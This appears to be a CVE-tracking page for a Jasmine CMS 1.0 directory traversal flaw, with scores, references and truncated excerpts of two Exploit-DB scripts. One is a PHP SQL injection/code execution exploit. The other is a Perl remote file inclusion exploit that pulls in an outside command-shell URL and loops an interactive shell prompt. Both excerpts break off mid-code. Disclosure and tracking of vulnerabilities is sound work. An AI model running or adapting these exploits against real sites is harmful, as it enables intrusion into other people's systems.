CVE-2007-3312
published 2007-06-21CVE-2007-3312: Directory traversal vulnerability in admin/plugin_manager.php in Jasmine CMS 1.0 allows remote authenticated administrators to include and execute arbitrary…
PriorityP345critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
7.32%
93.6th percentile
Directory traversal vulnerability in admin/plugin_manager.php in Jasmine CMS 1.0 allows remote authenticated administrators to include and execute arbitrary local files a .. (dot dot) in the u parameter. NOTE: a separate vulnerability could be leveraged to make this issue exploitable by remote unauthenticated attackers.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| efstratios_geroulis | jasmine_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Jasmine CMS 1.0 - SQL Injection / Remote Code Execution
exploitdb·2007-06-19
CVE-2007-3313 Jasmine CMS 1.0 - SQL Injection / Remote Code Execution
Jasmine CMS 1.0 - SQL Injection / Remote Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
function head(){
print "-------------------------------------------------------------------------\r\n";
print " Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
}
function footer(){
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
}
if ($exploit==0){
Exploit-DB
VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion
exploitdb·2007-01-22
CVE-2007-0489 VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion
VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion
---
#!/usr/bin/perl
#
#VisoHotlink 1.0 Remote File Include Exploit
#
#Download: http://www.easy-script.com/compt.php?id=3312
#
#Vulnerable Code: require_once( $mosConfig_absolute_path . '/includes/mosGetParam.php' );
#
#Coded by bd0rk || SOH-Crew
#
#Usage: exploit.pl [target] [cmd shell] [shell variable]
#
#Greetings: str0ke, TheJT, Doener, Perle, CodeR
#
#
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while()
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'includes/functions.visohotlink.php?mosConfig_absolute_path='.$Pathtoc
No writeups or analysis indexed.
http://osvdb.org/37067http://secunia.com/advisories/25737http://www.securityfocus.com/bid/24546http://www.vupen.com/english/advisories/2007/2264https://www.exploit-db.com/exploits/4081http://osvdb.org/37067http://secunia.com/advisories/25737http://www.securityfocus.com/bid/24546http://www.vupen.com/english/advisories/2007/2264https://www.exploit-db.com/exploits/4081
2007-06-21
Published